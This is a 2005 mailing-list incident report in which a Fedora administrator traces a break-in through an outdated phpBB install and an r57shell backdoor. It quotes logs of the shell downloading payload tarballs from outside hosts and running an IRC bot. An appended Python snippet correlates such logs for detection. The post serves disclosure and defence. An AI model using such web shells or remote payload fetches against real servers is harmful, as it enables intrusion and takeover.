Hacked Server WAS: Strange connection

> -----Original Message-----
> From: fedora-list-bounces@xxxxxxxxxx 
> [mailto:fedora-list-bounces@xxxxxxxxxx] On Behalf Of Levent Duymus
> Sent: Wednesday, July 20, 2005 11:39 AM
> To: For users of Fedora Core releases
> Subject: Re: Strange connection
> 
> 
> Also, you should give a much more detailed report about the suspicious
> activity, if it exists.



Conclusion.
This is what I've found.
I'm not running awstats, so it's not responsible.
As it transpired, phpBB must have been used: phpBB 2.0.8. I "forgot" it was
there, it was only used for testing purposes, but someone found it.


Firstly, I noticed that I had a strange connection when I ran "netstat -a
-v -p -t".

It said that I was connected to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org".


In the httpd access log I found:

172.149.xxx.xxx - r57 [02/Jul/2005:16:05:10 +0200] "POST /phpBB2/r57shell.php HTTP/1.1" 200 11581

This is a backdoor trojan.
It is not linked to any file, so it must have been used by the hacker to gain
access to my server.

In the httpd error logs I found this:

--21:34:47--  http://www.xxxx.ro/www/gulie.tgz
           => `gulie.tgz'
Slår upp www.xxxx.ro... 217.10.xxx.xxx       (Finding.....)
Ansluter till www.xxxxx.ro[217.10.xxx.xxx]:80... ansluten. (Connecting to.......connected)
HTTP-begäran skickad, väntar på svar... 200 OK (HTTP request sent, waiting for answer)
Längd: 229,187 [application/x-tar] (Length....)

    0K .......... .......... .......... .......... .......... 22%  119.67 KB/s
   50K .......... .......... .......... .......... .......... 44%  279.43 KB/s
  100K .......... .......... .......... .......... .......... 67%  358.69 KB/s
  150K .......... .......... .......... .......... .......... 89%  304.26 KB/s
  200K .......... .......... ...                             100%  406.82 KB/s

21:34:48 (233.38 KB/s) - "gulie.tgz" sparad [229187/229187]

Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html

This one was responsible for the connection to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org".
It was located in /var/tmp.


I also found this in the error logs:

--16:02:53--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Slår upp www.yyyy.us... 69.9.yyy.yy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 8,179 [application/x-tar]

    0K .......                                               100%   53.66 KB/s

16:02:55 (53.66 KB/s) - "cycomm.tar.gz" sparad [8179/8179]

--16:02:55--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Slår upp www.yyyy.us... 69.9.yyy.yy
Ansluter till www.yyyy.us[69.9.yyy.yy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 8,179 [application/x-tar]

    0K .......                                               100%   49.24 KB/s

16:02:56 (49.24 KB/s) - "cycomm.tar.gz" sparad [8179/8179]

bind: Address already in use
--16:03:36--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Slår upp www.yyyy.us... 69.9.yyy.yyy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   75.51 KB/s

16:03:37 (75.51 KB/s) - "roots.tar" sparad [30720/30720]

--16:03:37--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Slår upp www.yyyy.us... 69.9.yyy.yyy
Ansluter till www.yyyy.us[69.9.yyy.yyy]:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   68.40 KB/s

16:03:38 (68.40 KB/s) - "roots.tar" sparad [30720/30720]

error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
Cant open port
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key

These last ones have left no trace on the HDs at all.

Anyway, I backed up the server for now; I'll reinstall in the near future I think,
need to download the latest Core though.

With best regards

Tomas Larsson
Sweden

Verus Amicus Est Tamquam Alter Idem
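The triage described in the mail above, a POST to an unexpected PHP script in the access log lining up with wget transcripts in the error log, as an added Python example that is not part of the original post. The log lines are constructed to mirror the excerpts (placeholder hosts and addresses), and the 300-second correlation window is an assumed value.

```python
import re
# Constructed sample lines modelled on the excerpts in the post (hosts/IPs are placeholders).
ACCESS_LOG = """\
10.0.0.5 - - [02/Jul/2005:16:01:12 +0200] "GET /phpBB2/index.php HTTP/1.1" 200 8123
10.0.0.9 - r57 [02/Jul/2005:16:02:50 +0200] "POST /phpBB2/r57shell.php HTTP/1.1" 200 11581
10.0.0.5 - - [02/Jul/2005:16:04:00 +0200] "POST /phpBB2/posting.php HTTP/1.1" 302 0
""".splitlines()
ERROR_LOG = """\
[Sat Jul 02 16:00:01 2005] [notice] Apache configured -- resuming normal operations
--16:02:53--  http://www.example.invalid/cycomm.tar.gz
           => `cycomm.tar.gz'
HTTP-begäran skickad, väntar på svar... 200 OK
16:02:55 (53.66 KB/s) - "cycomm.tar.gz" sparad [8179/8179]
""".splitlines()

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^:]+:(?P<time>\d{2}:\d{2}:\d{2}) [^\]]*\] '
                       r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')  # Apache common/combined format
WGET_START_RE = re.compile(r'^--(\d{2}:\d{2}:\d{2})--\s+(\S+)')        # wget header, identical in every locale
WGET_DONE_RE = re.compile(r'^\d{2}:\d{2}:\d{2} .*\[(\d+)/(\d+)\]\s*$')  # "saved" text is localised, [got/total] is not

def tod(hms):  # HH:MM:SS -> seconds since midnight
    return sum(int(x) * k for x, k in zip(hms.split(':'), (3600, 60, 1)))

def php_posts(lines):  # POST requests to .php scripts -> (seconds, ip, user, path, status)
    out = []
    for m in filter(None, map(ACCESS_RE.match, lines)):
        if m['method'] == 'POST' and m['path'].lower().endswith('.php'):
            out.append((tod(m['time']), m['ip'], m['user'], m['path'], int(m['status'])))
    return out

def wget_downloads(lines):  # completed wget transfers written by the web server process -> (start, url, bytes)
    out, pending = [], None
    for line in lines:
        if s := WGET_START_RE.match(line):
            pending = (tod(s[1]), s[2])
        elif pending and (d := WGET_DONE_RE.match(line)):
            out.append((pending[0], pending[1], int(d[1])))
            pending = None
    return out

def correlate(access_lines, error_lines, window=300):
    """Pair each download with the latest PHP POST in the `window` seconds before it began."""
    posts, findings = php_posts(access_lines), []
    for start, url, size in wget_downloads(error_lines):
        before = [p for p in posts if 0 <= start - p[0] <= window]
        if before:
            when, ip, user, path, _ = max(before)  # tuples order by time first
            findings.append({'url': url, 'bytes': size, 'path': path, 'ip': ip,
                             'user': user, 'lag': start - when})
    return findings
```

A download that follows a POST to a script the application never shipped (here r57shell.php, three seconds earlier) is the pattern worth alerting on; a POST to a legitimate script that happens to fall in the window still deserves a look at that script's integrity.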
